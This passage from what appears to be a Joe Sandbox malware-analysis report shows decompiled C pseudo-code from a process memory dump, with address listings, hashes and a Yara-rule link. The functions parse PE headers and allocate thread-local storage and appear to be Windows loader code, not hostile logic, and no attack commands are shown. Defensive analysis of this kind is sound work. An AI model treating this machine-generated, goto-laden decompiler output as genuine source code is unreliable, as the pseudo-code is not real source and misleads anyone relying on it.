																			_t307 = _v60;
																		} else {
																			_t307 = _v132;
																			L69:
																			_v48 = _t307;
																			goto L70;
																		}
																	}
																}
															}
															L71:
															_v72 = _t307;
															_v84 = _t216;
															__eflags = _t216 - 0xc000007b;
															if(_t216 == 0xc000007b) {
																L150:
																_v8 = 0xfffffffe;
																_t211 = 0xc000007b;
															} else {
																_t344 = _t290 & 0xfffffffc;
																_v76 = _t344;
																__eflags = _v40 - _t344;
																if(_v40 <= _t344) {
																	goto L150;
																} else {
																	__eflags = _t307;
																	if(_t307 == 0) {
																		L75:
																		_t217 = 0;
																		_v104 = 0;
																		__eflags = _t366;
																		if(_t366 != 0) {
																			__eflags = _t290 & 0x00000001;
																			if((_t290 & 0x00000001) != 0) {
																				_t217 = 1;
																				_v104 = 1;
																			}
																			_t290 = _v44;
																			_v52 = _t290;
																		}
																		__eflags = _t217 - 1;
																		if(_t217 != 1) {
																			_t369 = 0;
																			_t218 = _v40;
																			goto L91;
																		} else {
																			_v64 = 0;
																			E017CE9C0(1, _t290, 0, 0,  &_v64);
																			_t309 = _v64;
																			_v108 = _t309;
																			__eflags = _t309;
																			if(_t309 == 0) {
																				goto L143;
																			} else {
																				_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																				__eflags = _t226 - 0x10b;
																				if(_t226 != 0x10b) {
																					__eflags = _t226 - 0x20b;
																					if(_t226 != 0x20b) {
																						goto L143;
																					} else {
																						_t371 =  *(_t309 + 0x98);
																						goto L83;
																					}
																				} else {
																					_t371 =  *(_t309 + 0x88);
																					L83:
																					__eflags = _t371;
																					if(_t371 != 0) {
																						_v80 = _t371 - _t356 + _t290;
																						_t310 = _v64;
																						_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																						_t292 =  *(_t310 + 6) & 0x0000ffff;
																						_t311 = 0;
																						__eflags = 0;
																						while(1) {
																							_v120 = _t311;
																							_v116 = _t348;
																							__eflags = _t311 - _t292;
																							if(_t311 >= _t292) {
																								goto L143;
																							}
																							_t359 =  *((intOrPtr*)(_t348 + 0xc));
																							__eflags = _t371 - _t359;
																							if(_t371 < _t359) {
																								L98:
																								_t348 = _t348 + 0x28;
																								_t311 = _t311 + 1;
																								continue;
																							} else {
																								__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																								if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																									goto L98;
																								} else {
																									__eflags = _t348;
																									if(_t348 == 0) {
																										goto L143;
																									} else {
																										_t218 = _v40;
																										_t312 =  *_t218;
																										__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																										if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																											_v100 = _t359;
																											_t360 = _v108;
																											_t372 = L017C8F44(_v108, _t312);
																											__eflags = _t372;
																											if(_t372 == 0) {
																												goto L143;
																											} else {
																												_t290 = _v52;
																												_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E017F3C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																												_t307 = _v72;
																												_t344 = _v76;
																												_t218 = _v40;
																												goto L91;
																											}
																										} else {
																											_t290 = _v52;
																											_t307 = _v72;
																											_t344 = _v76;
																											_t369 = _v80;
																											L91:
																											_t358 = _a4;
																											__eflags = _t358;
																											if(_t358 == 0) {
																												L95:
																												_t308 = _a8;
																												__eflags = _t308;
																												if(_t308 != 0) {
																													 *_t308 =  *((intOrPtr*)(_v40 + 4));
																												}
																												_v8 = 0xfffffffe;
																												_t211 = _v84;
																											} else {
																												_t370 =  *_t218 - _t369 + _t290;
																												 *_t358 = _t370;
																												__eflags = _t370 - _t344;
																												if(_t370 <= _t344) {
																													L149:
																													 *_t358 = 0;
																													goto L150;
																												} else {
																													__eflags = _t307;
																													if(_t307 == 0) {
																														goto L95;
																													} else {
																														__eflags = _t370 - _t344 + _t307;
																														if(_t370 >= _t344 + _t307) {
																															goto L149;
																														} else {
																															goto L95;
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																							goto L97;
																						}
																					}
																					goto L143;
																				}
																			}
																		}
																	} else {
																		__eflags = _v40 - _t307 + _t344;
																		if(_v40 >= _t307 + _t344) {
																			goto L150;
																		} else {
																			goto L75;
																		}
																	}
																}
															}
														}
														L97:
														 *[fs:0x0] = _v20;
														return _t211;
													}
												}
											}
										}
									} else {
										goto L46;
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}





































































































                                                    0x017cd5f2
                                                    0x017cd5f5
                                                    0x017cd5f5
                                                    0x017cd5fd
                                                    0x017cd600
                                                    0x017cd60a
                                                    0x017cd60d
                                                    0x017cd617
                                                    0x017cd61d
                                                    0x017cd627
                                                    0x017cd62e
                                                    0x017cd911
                                                    0x017cd913
                                                    0x00000000
                                                    0x017cd919
                                                    0x017cd919
                                                    0x017cd919
                                                    0x017cd634
                                                    0x017cd634
                                                    0x017cd634
                                                    0x017cd634
                                                    0x017cd640
                                                    0x017cd8bf
                                                    0x00000000
                                                    0x017cd646
                                                    0x017cd646
                                                    0x017cd64d
                                                    0x017cd652
                                                    0x0181b2fc
                                                    0x0181b2fc
                                                    0x0181b302
                                                    0x0181b33b
                                                    0x0181b341
                                                    0x00000000
                                                    0x0181b304
                                                    0x0181b304
                                                    0x0181b319
                                                    0x0181b31e
                                                    0x0181b324
                                                    0x0181b326
                                                    0x0181b332
                                                    0x0181b347
                                                    0x0181b34c
                                                    0x0181b351
                                                    0x0181b35a
                                                    0x00000000
                                                    0x0181b328
                                                    0x0181b328
                                                    0x00000000
                                                    0x0181b328
                                                    0x0181b326
                                                    0x017cd658
                                                    0x017cd658
                                                    0x017cd65b
                                                    0x017cd665
                                                    0x00000000
                                                    0x017cd66b
                                                    0x017cd66b
                                                    0x017cd66b
                                                    0x017cd66b
                                                    0x017cd66d
                                                    0x017cd672
                                                    0x017cd67a
                                                    0x00000000
                                                    0x00000000
                                                    0x017cd680
                                                    0x017cd686
                                                    0x017cd8ce
                                                    0x017cd8d4
                                                    0x017cd8dd
                                                    0x017cd8e0
                                                    0x017cd68c
                                                    0x017cd691
                                                    0x017cd69d
                                                    0x017cd6a2
                                                    0x017cd6a7
                                                    0x017cd6b0
                                                    0x017cd6b5
                                                    0x017cd6e0
                                                    0x017cd6b7
                                                    0x017cd6b7
                                                    0x017cd6b9
                                                    0x017cd6b9
                                                    0x017cd6bb
                                                    0x017cd6bd
                                                    0x017cd6ce
                                                    0x017cd6d0
                                                    0x017cd6d2
                                                    0x0181b363
                                                    0x0181b365
                                                    0x00000000
                                                    0x0181b36b
                                                    0x00000000
                                                    0x0181b36b
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x017cd6bf
                                                    0x017cd6bf
                                                    0x017cd6e5
                                                    0x017cd6e7
                                                    0x017cd6e9
                                                    0x017cd6ec
                                                    0x017cd6ec
                                                    0x017cd6ef
                                                    0x017cd6f5
                                                    0x017cd6f9
                                                    0x017cd6fb
                                                    0x017cd6fd
                                                    0x017cd701
                                                    0x017cd703
                                                    0x017cd70a
                                                    0x017cd70a
                                                    0x017cd701
                                                    0x017cd710
                                                    0x017cd710
                                                    0x017cd6c1
                                                    0x017cd6c1
                                                    0x017cd6c6
                                                    0x0181b36d
                                                    0x0181b36f
                                                    0x00000000
                                                    0x0181b375
                                                    0x0181b375
                                                    0x0181b375
                                                    0x00000000
                                                    0x0181b375
                                                    0x00000000
                                                    0x017cd6cc
                                                    0x017cd6d8
                                                    0x017cd6d8
                                                    0x017cd6d8
                                                    0x00000000
                                                    0x017cd6c6
                                                    0x017cd6bf
                                                    0x00000000
                                                    0x017cd6da
                                                    0x017cd6da
                                                    0x017cd716
                                                    0x017cd71b
                                                    0x017cd720
                                                    0x017cd726
                                                    0x017cd726
                                                    0x017cd72d
                                                    0x00000000
                                                    0x017cd733
                                                    0x017cd739
                                                    0x017cd742
                                                    0x017cd750
                                                    0x017cd758
                                                    0x017cd764
                                                    0x017cd776
                                                    0x017cd77a
                                                    0x017cd783
                                                    0x017cd928
                                                    0x017cd92c
                                                    0x017cd93d
                                                    0x017cd944
                                                    0x017cd94f
                                                    0x017cd954
                                                    0x017cd956
                                                    0x017cd95f
                                                    0x017cd961
                                                    0x017cd973
                                                    0x017cd973
                                                    0x017cd956
                                                    0x017cd944
                                                    0x017cd92c
                                                    0x017cd78b
                                                    0x0181b394
                                                    0x017cd791
                                                    0x017cd798
                                                    0x0181b3a3
                                                    0x0181b3bb
                                                    0x0181b3bb
                                                    0x017cd7a5
                                                    0x017cd866
                                                    0x017cd870
                                                    0x017cd892
                                                    0x017cd898
                                                    0x017cd89e
                                                    0x017cd8a0
                                                    0x017cd8a6
                                                    0x017cd8ac
                                                    0x017cd8ae
                                                    0x017cd8b4
                                                    0x017cd8b4
                                                    0x017cd8ae
                                                    0x017cd7a5
                                                    0x017cd78b
                                                    0x017cd7b1
                                                    0x0181b3c5
                                                    0x0181b3c5
                                                    0x017cd7c3
                                                    0x017cd7ca
                                                    0x017cd7e5
                                                    0x017cd7eb
                                                    0x017cd8eb
                                                    0x017cd8ed
                                                    0x00000000
                                                    0x017cd8f3
                                                    0x017cd8f3
                                                    0x017cd8f3
                                                    0x00000000
                                                    0x017cd8ed
                                                    0x017cd7cc
                                                    0x017cd7cc
                                                    0x017cd7d2
                                                    0x00000000
                                                    0x017cd7d4
                                                    0x017cd7d4
                                                    0x017cd7d7
                                                    0x017cd7df
                                                    0x0181b3d4
                                                    0x0181b3d9
                                                    0x0181b3dc
                                                    0x0181b3dc
                                                    0x0181b3df
                                                    0x0181b3e2
                                                    0x0181b468
                                                    0x0181b46d
                                                    0x0181b46f
                                                    0x0181b46f
                                                    0x0181b475
                                                    0x017cd8f8
                                                    0x017cd8f9
                                                    0x017cd8fd
                                                    0x0181b3e8
                                                    0x0181b3e8
                                                    0x0181b3eb
                                                    0x0181b3ed
                                                    0x00000000
                                                    0x0181b3ef
                                                    0x0181b3ef
                                                    0x0181b3f1
                                                    0x0181b3f4
                                                    0x0181b3fe
                                                    0x0181b404
                                                    0x0181b409
                                                    0x0181b40e
                                                    0x0181b410
                                                    0x0181b410
                                                    0x0181b414
                                                    0x0181b414
                                                    0x0181b41b
                                                    0x0181b420
                                                    0x0181b423
                                                    0x0181b425
                                                    0x0181b427
                                                    0x0181b42a
                                                    0x0181b42d
                                                    0x0181b42d
                                                    0x0181b42a
                                                    0x0181b432
                                                    0x0181b436
                                                    0x0181b438
                                                    0x0181b43b
                                                    0x0181b43b
                                                    0x0181b449
                                                    0x0181b44e
                                                    0x0181b454
                                                    0x0181b458
                                                    0x0181b458
                                                    0x0181b45d
                                                    0x00000000
                                                    0x0181b45d
                                                    0x0181b3ed
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x017cd7df
                                                    0x017cd7d2
                                                    0x017cd7ca
                                                    0x0181b37c
                                                    0x0181b37e
                                                    0x0181b385
                                                    0x0181b38a
                                                    0x00000000
                                                    0x0181b38a
                                                    0x017cd742
                                                    0x017cd7f1
                                                    0x017cd7f8
                                                    0x0181b49b
                                                    0x0181b49b
                                                    0x017cd800
                                                    0x017cd837
                                                    0x017cd843
                                                    0x017cd845
                                                    0x017cd847
                                                    0x017cd84a
                                                    0x017cd84b
                                                    0x017cd84e
                                                    0x017cd857
                                                    0x017cd818
                                                    0x017cd824
                                                    0x017cd831
                                                    0x0181b4a5
                                                    0x0181b4ab
                                                    0x0181b4b3
                                                    0x0181b4b8
                                                    0x0181b4bb
                                                    0x00000000
                                                    0x0181b4c1
                                                    0x0181b4c1
                                                    0x0181b4c8
                                                    0x00000000
                                                    0x0181b4ce
                                                    0x0181b4d4
                                                    0x0181b4e1
                                                    0x0181b4e3
                                                    0x0181b4e5
                                                    0x00000000
                                                    0x0181b4eb
                                                    0x0181b4f0
                                                    0x0181b4f2
                                                    0x017cdac9
                                                    0x017cdacc
                                                    0x017cdacf
                                                    0x017cdad1
                                                    0x017cdd78
                                                    0x017cdd78
                                                    0x017cdcf2
                                                    0x00000000
                                                    0x017cdad7
                                                    0x017cdad9
                                                    0x017cdadb
                                                    0x00000000
                                                    0x00000000
                                                    0x017cdae1
                                                    0x017cdae1
                                                    0x017cdae4
                                                    0x017cdae6
                                                    0x0181b4f9
                                                    0x0181b4f9
                                                    0x0181b500
                                                    0x017cdaec
                                                    0x017cdaec
                                                    0x017cdaf5
                                                    0x017cdaf8
                                                    0x017cdafb
                                                    0x017cdb03
                                                    0x017cdb11
                                                    0x017cdb16
                                                    0x017cdb19
                                                    0x017cdb1b
                                                    0x0181b52c
                                                    0x0181b531
                                                    0x0181b534
                                                    0x017cdb21
                                                    0x017cdb21
                                                    0x017cdb24
                                                    0x017cdcd9
                                                    0x017cdce2
                                                    0x017cdce5
                                                    0x017cdd6a
                                                    0x017cdd6d
                                                    0x00000000
                                                    0x017cdd73
                                                    0x0181b51a
                                                    0x0181b51c
                                                    0x0181b51f
                                                    0x0181b524
                                                    0x00000000
                                                    0x0181b524
                                                    0x017cdce7
                                                    0x017cdce7
                                                    0x017cdce7
                                                    0x00000000
                                                    0x017cdce7
                                                    0x00000000
                                                    0x017cdb2a
                                                    0x017cdb2c
                                                    0x017cdb31
                                                    0x017cdb33
                                                    0x017cdb36
                                                    0x017cdb39
                                                    0x017cdb3b
                                                    0x017cdb66
                                                    0x017cdb66
                                                    0x017cdb3d
                                                    0x017cdb3d
                                                    0x017cdb3e
                                                    0x017cdb46
                                                    0x017cdb47
                                                    0x017cdb49
                                                    0x017cdb4c
                                                    0x017cdb53
                                                    0x017cdb55
                                                    0x017cdb58
                                                    0x017cdb5a
                                                    0x0181b50a
                                                    0x0181b50f
                                                    0x0181b512
                                                    0x017cdb60
                                                    0x017cdb60
                                                    0x017cdb63
                                                    0x017cdb63
                                                    0x00000000
                                                    0x017cdb63
                                                    0x017cdb5a
                                                    0x017cdb3b
                                                    0x017cdb24
                                                    0x017cdb69
                                                    0x017cdb69
                                                    0x017cdb6c
                                                    0x017cdb6f
                                                    0x017cdb74
                                                    0x0181b557
                                                    0x0181b557
                                                    0x0181b55e
                                                    0x017cdb7a
                                                    0x017cdb7c
                                                    0x017cdb7f
                                                    0x017cdb82
                                                    0x017cdb85
                                                    0x00000000
                                                    0x017cdb8b
                                                    0x017cdb8b
                                                    0x017cdb8d
                                                    0x017cdb9b
                                                    0x017cdb9b
                                                    0x017cdb9d
                                                    0x017cdba0
                                                    0x017cdba2
                                                    0x017cdba4
                                                    0x017cdba7
                                                    0x017cdba9
                                                    0x017cdbae
                                                    0x017cdbae
                                                    0x017cdbb1
                                                    0x017cdbb4
                                                    0x017cdbb4
                                                    0x017cdbb7
                                                    0x017cdbba
                                                    0x017cdcd2
                                                    0x017cdcd4
                                                    0x00000000
                                                    0x017cdbc0
                                                    0x017cdbc0
                                                    0x017cdbd2
                                                    0x017cdbd7
                                                    0x017cdbda
                                                    0x017cdbdd
                                                    0x017cdbdf
                                                    0x00000000
                                                    0x017cdbe5
                                                    0x017cdbe5
                                                    0x017cdbee
                                                    0x017cdbf1
                                                    0x0181b541
                                                    0x0181b544
                                                    0x00000000
                                                    0x0181b546
                                                    0x0181b546
                                                    0x00000000
                                                    0x0181b546
                                                    0x017cdbf7
                                                    0x017cdbf7
                                                    0x017cdbfd
                                                    0x017cdbfd
                                                    0x017cdbff
                                                    0x017cdc0b
                                                    0x017cdc15
                                                    0x017cdc1b
                                                    0x017cdc1d
                                                    0x017cdc21
                                                    0x017cdc21
                                                    0x017cdc23
                                                    0x017cdc23
                                                    0x017cdc26
                                                    0x017cdc29
                                                    0x017cdc2b
                                                    0x00000000
                                                    0x00000000
                                                    0x017cdc31
                                                    0x017cdc34
                                                    0x017cdc36
                                                    0x017cdcbf
                                                    0x017cdcbf
                                                    0x017cdcc2
                                                    0x00000000
                                                    0x017cdc3c
                                                    0x017cdc41
                                                    0x017cdc43
                                                    0x00000000
                                                    0x017cdc45
                                                    0x017cdc45
                                                    0x017cdc47
                                                    0x00000000
                                                    0x017cdc4d
                                                    0x017cdc4d
                                                    0x017cdc50
                                                    0x017cdc52
                                                    0x017cdc55
                                                    0x017cdcfa
                                                    0x017cdcfe
                                                    0x017cdd08
                                                    0x017cdd0a
                                                    0x017cdd0c
                                                    0x00000000
                                                    0x017cdd12
                                                    0x017cdd15
                                                    0x017cdd2d
                                                    0x017cdd2f
                                                    0x017cdd32
                                                    0x017cdd35
                                                    0x00000000
                                                    0x017cdd35
                                                    0x017cdc5b
                                                    0x017cdc5b
                                                    0x017cdc5e
                                                    0x017cdc61
                                                    0x017cdc64
                                                    0x017cdc67
                                                    0x017cdc67
                                                    0x017cdc6a
                                                    0x017cdc6c
                                                    0x017cdc8e
                                                    0x017cdc8e
                                                    0x017cdc91
                                                    0x017cdc93
                                                    0x017cdcce
                                                    0x017cdcce
                                                    0x017cdc95
                                                    0x017cdc9c
                                                    0x017cdc6e
                                                    0x017cdc72
                                                    0x017cdc75
                                                    0x017cdc77
                                                    0x017cdc79
                                                    0x0181b551
                                                    0x0181b551
                                                    0x00000000
                                                    0x017cdc7f
                                                    0x017cdc7f
                                                    0x017cdc81
                                                    0x00000000
                                                    0x017cdc83
                                                    0x017cdc86
                                                    0x017cdc88
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x017cdc88
                                                    0x017cdc81
                                                    0x017cdc79
                                                    0x017cdc6c
                                                    0x017cdc55
                                                    0x017cdc47
                                                    0x017cdc43
                                                    0x00000000
                                                    0x017cdc36
                                                    0x017cdc23
                                                    0x00000000
                                                    0x017cdbff
                                                    0x017cdbf1
                                                    0x017cdbdf
                                                    0x017cdb8f
                                                    0x017cdb92
                                                    0x017cdb95
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x017cdb95
                                                    0x017cdb8d
                                                    0x017cdb85
                                                    0x017cdb74
                                                    0x017cdc9f
                                                    0x017cdca2
                                                    0x017cdcb0
                                                    0x017cdcb0
                                                    0x017cdad1
                                                    0x0181b4e5
                                                    0x0181b4c8
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x017cd831
                                                    0x00000000
                                                    0x017cd800
                                                    0x0181b47f
                                                    0x0181b485
                                                    0x00000000
                                                    0x0181b485
                                                    0x017cd665
                                                    0x017cd652
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4b45584649ae2eaf2ceb58d6d5d18f9ba9d4902ef6aaaafff85e49b67d11f75b
                                                    • Instruction ID: fde7c1013a2aceed0f365d4a16a1c171a3ccccc2e81afde9c0f489c3157e43a7
                                                    • Opcode Fuzzy Hash: 4b45584649ae2eaf2ceb58d6d5d18f9ba9d4902ef6aaaafff85e49b67d11f75b
                                                    • Instruction Fuzzy Hash: 48E1F131A0025ACFEB34DF68C884BAAF7B6BF45704F0441ADD909A7295D774AA81CF91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017C849B Relevance: .3, Instructions: 290COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 92%
                                                    			E017C849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x188f9c0);
				E0180D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x18a7b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E017CCEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E017D2280( *[fs:0x30], 0x18a8550);
						_t139 =  *0x18a7b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E017EF3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E017CFFB0(_t193, _t235, 0x18a8550);
								L5:
								return E0180D130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E017B1C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x18a7b9c; // 0x0
							_t235 = L017D4620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x18a7b10; // 0x0
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E017EA61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E017CFFB0(_t193, _t235, 0x18a8550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L017D77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L017D77F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x18a7b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x18a7b10; // 0x0
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E017F37C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x18a7b9c; // 0x0
									_t214 = L017D4620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E017F37F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x18a7b10 =  *0x18a7b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x18a7b04 =  *0x18a7b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L017D77F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L017D77F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x18a7b08 =  *0x18a7b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E017F57C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E017FF3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L017D77F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E017EA44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L017D77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E017F96C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

































                                                    0x017c849b
                                                    0x017c849b
                                                    0x017c849b
                                                    0x017c849b
                                                    0x017c849d
                                                    0x017c84a2
                                                    0x017c84a7
                                                    0x017c84b1
                                                    0x017c84d8
                                                    0x00000000
                                                    0x017c84b3
                                                    0x017c84c4
                                                    0x017c84c9
                                                    0x017c84cd
                                                    0x017c84cf
                                                    0x017c84cf
                                                    0x017c84d6
                                                    0x017c84e6
                                                    0x017c84e9
                                                    0x017c84ec
                                                    0x017c84ef
                                                    0x017c84f2
                                                    0x017c84f4
                                                    0x017c84fc
                                                    0x017c8501
                                                    0x017c8506
                                                    0x017c8509
                                                    0x017c86e0
                                                    0x017c86e5
                                                    0x017c86e8
                                                    0x017c86ed
                                                    0x017c86f0
                                                    0x017c86f2
                                                    0x01819afd
                                                    0x01819b02
                                                    0x017c84da
                                                    0x017c84df
                                                    0x017c84df
                                                    0x017c86fa
                                                    0x017c86fd
                                                    0x017c86fe
                                                    0x017c8701
                                                    0x017c8706
                                                    0x017c8709
                                                    0x017c870b
                                                    0x00000000
                                                    0x00000000
